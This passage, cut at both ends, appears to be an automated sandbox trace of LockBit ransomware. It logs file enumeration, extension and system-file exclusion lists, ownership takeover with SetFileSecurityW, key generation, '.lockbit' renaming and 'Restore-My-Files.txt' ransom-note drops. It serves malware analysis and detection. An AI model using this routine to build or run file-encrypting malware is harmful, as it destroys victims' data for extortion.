Maker\\Shared\\DvdStyles\\HueCycle" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\") returned="" [0081.207] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png") returned=".png" [0081.207] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.207] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.207] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.208] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.208] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.208] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.208] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.208] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.208] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.208] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.208] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.208] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.208] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.208] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.208] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.208] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.208] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.208] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png.lockbit") returned 95 [0081.208] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.209] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.209] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.209] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.209] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.209] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.209] RtlFreeAnsiString (AnsiString="\\") [0081.209] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0081.209] malloc (_Size=0x200) returned 0x77d800 [0081.209] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.209] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.210] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.210] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.210] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.210] CloseHandle (hObject=0x3c4) returned 1 [0081.210] free (_Block=0x77d800) [0081.210] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.211] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.211] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.211] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5025) returned 1 [0081.211] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.211] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.211] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.212] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.212] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.220] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.220] malloc (_Size=0xd4) returned 0x77d800 [0081.221] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd4, FileInformationClass=0xa) returned 0xc0000008 [0081.221] free (_Block=0x77d800) [0081.221] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 1 [0081.221] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt") returned 74 [0081.221] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.221] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb911bc, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb911bc, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0081.221] lstrcmpiW (lpString1=".", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0081.221] lstrcmpiW (lpString1="..", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0081.221] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0081.221] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.221] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.221] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.221] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.221] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.221] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.221] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.221] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.221] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.221] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.221] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.221] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.221] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.221] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.222] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.222] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.222] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.222] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.222] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.222] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.222] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.222] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.223] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.223] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.223] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.223] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.223] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.223] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.223] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.223] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.223] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.223] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.223] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.223] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0081.223] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0081.223] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0081.223] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0081.223] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0081.223] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0081.223] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0081.223] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\") returned="" [0081.223] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png") returned=".png" [0081.223] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.223] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.223] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.223] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.223] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.223] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.224] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.224] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.224] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.224] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.224] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.224] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.224] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.224] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.224] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png.lockbit") returned 101 [0081.224] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.225] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.225] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.225] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.225] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.225] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.226] RtlFreeAnsiString (AnsiString="\\") [0081.226] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0081.226] malloc (_Size=0x200) returned 0x77d800 [0081.226] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.226] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.226] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.226] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.226] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.227] CloseHandle (hObject=0x3c4) returned 1 [0081.227] free (_Block=0x77d800) [0081.227] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.227] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.227] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.227] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3118) returned 1 [0081.227] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.228] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.241] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.241] malloc (_Size=0xe0) returned 0x77d800 [0081.241] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xe0, FileInformationClass=0xa) returned 0xc0000008 [0081.241] free (_Block=0x77d800) [0081.241] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 1 [0081.241] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt") returned 74 [0081.241] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.241] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb911bc, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb911bc, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0081.241] lstrcmpiW (lpString1=".", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0081.241] lstrcmpiW (lpString1="..", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0081.241] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0081.241] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.241] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.241] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.241] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.242] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.242] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.242] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.242] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.242] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.242] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.242] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.243] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.243] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.243] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.243] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.243] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0081.243] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0081.243] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0081.243] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0081.243] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0081.243] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0081.243] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0081.243] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\") returned="" [0081.243] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png") returned=".png" [0081.243] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.243] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.243] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.243] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.244] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.244] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.244] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.244] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.244] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.244] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.244] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.244] lstrcmpiW (lpString1=".frm", lpString2=".png") returned 